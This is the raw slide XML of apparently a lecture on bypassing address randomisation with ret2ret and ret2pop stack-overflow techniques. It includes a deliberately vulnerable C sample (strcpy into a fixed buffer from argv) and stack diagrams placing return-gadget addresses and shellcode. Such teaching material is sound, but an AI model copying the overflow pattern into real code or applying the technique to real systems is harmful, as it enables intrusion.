          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>might consider this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>technique when</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Text section isn’t randomized (uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t> of ret </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>instr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Can overwrite pointer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t> that points to stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t> is higher on the stack than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4191000" y="3355975"/>
            <a:ext cx="4267200" cy="3139321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>void f(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  char buffer[256];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(buffer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> main(</a:t>
            </a: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argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>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no = 1;</a:t>
            </a:r>
          </a:p>
          <a:p>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ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = &amp;no;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  f(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="17" name="Table 16"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1756816750"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2100585" y="3355975"/>
          <a:ext cx="1785615" cy="3197225"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1785615"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>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&amp;no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saved ret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algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>saved </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
                        <a:t>ebp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216025">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>buffer</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2061120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ret2pop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40962" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>If there is a valuable (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>potential </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>pointer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> on a stack, you might consider this technique.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="stack3.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540000"/>
            <a:ext cx="1690687" cy="418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a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2425700" y="4578350"/>
            <a:ext cx="1235075" cy="1879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rgbClr val="FFFFFE"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>overwrite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFE"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2419350" y="40957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&amp;ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2419350" y="3638550"/>
            <a:ext cx="124777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FFFE"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>&amp;pop-ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 11"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="949325" y="4318000"/>
            <a:ext cx="1246188" cy="369888"/>
            <a:chOff x="945163" y="4318669"/>
            <a:chExt cx="1245430" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Notched Right Arrow 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1521075" y="4469255"/>
              <a:ext cx="669518" cy="166436"/>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solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40973" name="TextBox 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="945163" y="4318669"/>
              <a:ext cx="532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latin typeface="Trebuchet MS" charset="0"/>
                </a:rPr>
                <a:t>esp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2709863" y="3249613"/>
            <a:ext cx="646331" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="30196"/>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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>0x00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3900755" y="2880654"/>
            <a:ext cx="5094287" cy="35096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dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3662363" y="2752873"/>
            <a:ext cx="4021673" cy="892552"/>
            <a:chOff x="3662363" y="2752873"/>
            <a:chExt cx="4021673" cy="892552"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3662363" y="2911884"/>
              <a:ext cx="1264043" cy="25655"/>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953000" y="2752873"/>
              <a:ext cx="2731036" cy="892552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t>shellcode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t/>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t>(assume perfected)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="192638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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -4.68934E-6 -0.00046 L -4.68934E-6 -0.05738 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-2846"/>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4.68934E-6 -0.05738 L -4.68934E-6 -0.12518 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3401"/>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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -4.68934E-6 -0.12541 L -4.68934E-6 -0.1969 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3586"/>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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -4.68934E-6 -0.1969 L -4.68934E-6 -0.2559 " pathEditMode="relative" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>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nodePh="1">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:endCondLst>
                                    <p:cond evt="begin" delay="0">
                                      <p:tn val="44"/>
                                    </p:cond>
                                  </p:end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ret2ret / ret2pop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43010" name="Content Placeholder 3" descr="ret2ret.pdf"/>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865188" y="1417638"/>
            <a:ext cx="3322637" cy="5311775"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43011" name="Picture 4" descr="Screen shot 2010-03-01 at 3.40.16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5100" y="3508375"/>
            <a:ext cx="4152900"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12" name="Picture 5" descr="Screen shot 2010-03-01 at 3.40.40 P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75100" y="2914650"/>
            <a:ext cx="4711700" cy="41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3975100" y="1681163"/>
            <a:ext cx="4390670" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>➠ You can use either </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
